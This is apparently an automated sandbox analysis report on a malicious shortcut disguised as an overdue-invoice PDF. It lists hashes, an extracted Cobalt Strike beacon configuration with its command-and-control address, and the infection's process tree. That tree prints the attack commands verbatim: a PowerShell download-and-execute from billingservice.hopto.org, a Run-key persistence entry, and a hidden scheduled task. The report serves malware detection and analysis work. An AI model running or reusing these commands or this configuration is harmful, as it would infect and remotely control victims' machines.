Analysis
-
max time kernel
114s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
06-02-2023 16:44
Static task
static1
Behavioral task
behavioral1
Sample
Overdue_Invoice_2023B.pdf.lnk
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Overdue_Invoice_2023B.pdf.lnk
Resource
win10v2004-20220812-en
General
-
Target
Overdue_Invoice_2023B.pdf.lnk
-
Size
1KB
-
MD5
094815ab6988cda2101381cbeeb0056e
-
SHA1
df5f22ce9d8e0ee3ebca101f5112c6456088d317
-
SHA256
0135c4f45de3e2187708033da3135210b03c9db4275dfa794dbcbff21b4f4df9
-
SHA512
c8f3aae210a0157275c0f24e9175ef9d508c55fd5c8e48e6c10e95a79a9f41927d5574dc5197c9594f6fbfefe3eb19f851570c6bb5e0eaecd6311731e26e4363
Malware Config
Extracted
cobaltstrike
987654321
http://185.225.74.52:443/favicon.js
-
access_type
512
-
beacon_type
2048
-
host
185.225.74.52,/favicon.js
-
http_header1
AAAAEAAAABpIb3N0OiBidXNpbmVzc3NlcnZpY2VzLmNvbQAAAAoAAAARQ29ubmVjdGlvbjogY2xvc2UAAAAKAAAAE0FjY2VwdC1FbmNvZGluZzogYnIAAAAKAAAAFkFjY2VwdC1MYW5ndWFnZTogZW4tVVMAAAAHAAAAAAAAAA0AAAADAAAAAgAAABp3b29jb21tZXJjZV9pdGVtc19pbl9jYXJ0PQAAAAYAAAAGQ29va2llAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
-
http_header2
AAAAEAAAABpIb3N0OiBidXNpbmVzc3NlcnZpY2VzLmNvbQAAAAoAAAARQ29ubmVjdGlvbjogY2xvc2UAAAAKAAAAGUFjY2VwdC1FbmNvZGluZzogZ3ppcCwgYnIAAAAKAAAAL0NvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkAAAABwAAAAEAAAANAAAAAwAAAAIAAAAIZGV0YWlscz0AAAAEAAAABwAAAAAAAAADAAAAAgAAAA5fX3Nlc3Npb25fX2lkPQAAAAYAAAAGQ29va2llAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
-
http_method1
GET
-
http_method2
POST
-
jitter
9472
-
polling_time
55991
-
port_number
443
-
sc_process32
%windir%\syswow64\dllhost.exe
-
sc_process64
%windir%\sysnative\dllhost.exe
-
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCMEuNG3asVOp+bgSmSog10bB55R9e+aj5dF2sVbnRjA/dTkltRdDD0DdF5vJh/gURBikZ4FxqqmfqR2SPAheOzDDrYvV7ScpwPkZe8IUd/DbJmPs30ST9SGHn+eLjTQQEU+I142t7yTsO7HCKf1CTDMHfS3PNoz3V8ivNRwL1aiQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown1
9.63976192e+08
-
unknown2
AAAABAAAAAIAAANxAAAAAwAAAA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
uri
/btn_bg
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/42.0.2311.135
-
watermark
987654321
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
RuntimeBroker.exedescription pid process target process PID 4380 created 760 4380 RuntimeBroker.exe Explorer.EXE PID 4380 created 760 4380 RuntimeBroker.exe Explorer.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 19 1308 powershell.exe 20 1100 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
Processes:
RuntimeBroker.exepid process 4380 RuntimeBroker.exe -
Loads dropped DLL 1 IoCs
Processes:
RuntimeBroker.exepid process 4380 RuntimeBroker.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftLibrary = "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\\Libraries\\MicrosoftLibrary; Start-Process $env:Public\\Libraries\\MicrosoftLibrary\\RuntimeBroker.exe\"" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes:
powershell.exepowershell.exeRuntimeBroker.exeAcroRd32.exepid process 1308 powershell.exe 1308 powershell.exe 1100 powershell.exe 1100 powershell.exe 4380 RuntimeBroker.exe 4380 RuntimeBroker.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
Processes:
RuntimeBroker.exepid process 4380 RuntimeBroker.exe 4380 RuntimeBroker.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1308 powershell.exe Token: SeDebugPrivilege 1100 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AcroRd32.exepid process 2132 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
AcroRd32.exepid process 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe 2132 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exepowershell.exeAcroRd32.exeRdrCEF.exedescription pid process target process PID 5000 wrote to memory of 1308 5000 cmd.exe powershell.exe PID 5000 wrote to memory of 1308 5000 cmd.exe powershell.exe PID 5000 wrote to memory of 1308 5000 cmd.exe powershell.exe PID 1308 wrote to memory of 1100 1308 powershell.exe powershell.exe PID 1308 wrote to memory of 1100 1308 powershell.exe powershell.exe PID 1308 wrote to memory of 1100 1308 powershell.exe powershell.exe PID 1100 wrote to memory of 2132 1100 powershell.exe AcroRd32.exe PID 1100 wrote to memory of 2132 1100 powershell.exe AcroRd32.exe PID 1100 wrote to memory of 2132 1100 powershell.exe AcroRd32.exe PID 1100 wrote to memory of 2140 1100 powershell.exe attrib.exe PID 1100 wrote to memory of 2140 1100 powershell.exe attrib.exe PID 1100 wrote to memory of 2140 1100 powershell.exe attrib.exe PID 2132 wrote to memory of 2572 2132 AcroRd32.exe RdrCEF.exe PID 2132 wrote to memory of 2572 2132 AcroRd32.exe RdrCEF.exe PID 2132 wrote to memory of 2572 2132 AcroRd32.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4484 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4312 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4312 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4312 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4312 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4312 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4312 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4312 2572 RdrCEF.exe RdrCEF.exe PID 2572 wrote to memory of 4312 2572 RdrCEF.exe RdrCEF.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Overdue_Invoice_2023B.pdf.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 Invoke-WebRequest 'http://billingservice.hopto.org/UY7G6S/s4Nt4.txt' -UseBasicParsing | Select-Object -Expand Content | powershell2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"3⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\Invoice.pdf"4⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140435⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=21B5C907505A0E52617CE897434ABB30 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4782532CF8BFD166D6E977C81EDEC328 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4782532CF8BFD166D6E977C81EDEC328 --renderer-client-id=2 --mojo-platform-channel-handle=1744 --allow-no-sandbox-job /prefetch:16⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7AC83CBFEE2F13C70836B7A7055C51CE --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7AC83CBFEE2F13C70836B7A7055C51CE --renderer-client-id=4 --mojo-platform-channel-handle=2180 --allow-no-sandbox-job /prefetch:16⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2D1AD4ADF0C97CDFCDF1449F3A8DD10A --mojo-platform-channel-handle=2212 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3DC38C5C32415F51F53A42E9A2004E0D --mojo-platform-channel-handle=2632 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5FC3B0A6BAF7827216FD4F026B9F8376 --mojo-platform-channel-handle=2408 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
C:\Windows\SysWOW64\attrib.exe"C:\Windows\system32\attrib.exe" +h C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a9534⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953\RuntimeBroker.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Windows\System32\cmd.exe/C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftLibrary /t REG_SZ /d "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe"" /f5⤵
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftLibrary /t REG_SZ /d "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe"" /f6⤵
- Adds Run key to start application
- Modifies registry key
-
C:\Windows\System32\schtasks.exe/F /Create /TN Microsoft_Library /sc minute /MO 80 /TR "powershell.exe -WindowStyle hidden -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe5⤵
- Creates scheduled task(s)
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\windows\system32\wermgr.exe"C:\windows\system32\wermgr.exe"2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5da716b5cb0693cd2dbbfd96430f6ec86
SHA184f1cc86cc4318d1033e8c435e8d5366f454f998
SHA2569dd85493e4642fb90dbb13a2fc254023abba467f0a4a41b83f97f7fe3826ec0f
SHA512cd010f7d327f2e66def5d08d9366d5ae03f69c8ac87f8b697ed17fbbd9b82f2a7b482509a2aae25d5fd53677906a53d9eda13d8cbf25bfc3654d3cb93b2b0c9e
-
C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953\RuntimeBroker.exeFilesize
100KB
MD5ba4cfe6461afa1004c52f19c8f2169dc
SHA1ab8539ef6b2a93ff9589dec4b34a0257b6296c92
SHA256e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628
SHA5122c5190d7609767237311260f241c619b82434ca640f396bb9710d356286844f82f320f9e05525a38707f2a52977790c0c3e2a217b36a7f0095a87c138b939af0
-
C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953\RuntimeBroker.exeFilesize
100KB
MD5ba4cfe6461afa1004c52f19c8f2169dc
SHA1ab8539ef6b2a93ff9589dec4b34a0257b6296c92
SHA256e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628
SHA5122c5190d7609767237311260f241c619b82434ca640f396bb9710d356286844f82f320f9e05525a38707f2a52977790c0c3e2a217b36a7f0095a87c138b939af0
-
C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953\UMPDC.dllFilesize
391KB
MD51570c92c1c5f039c438295ac68ff7e82
SHA13ee6c1d3582361e8af4efec44b1d1420494ab728
SHA256b41b4e32607a4e21593332da63ce1bcf9c1d43f8f6754789a43bea7428833ea4
